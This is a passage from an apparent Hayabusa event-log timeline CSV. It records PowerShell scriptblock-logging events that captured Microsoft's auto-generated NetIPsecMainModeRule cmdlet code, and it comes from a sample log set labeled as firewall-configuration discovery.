(cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"= $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( 
[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
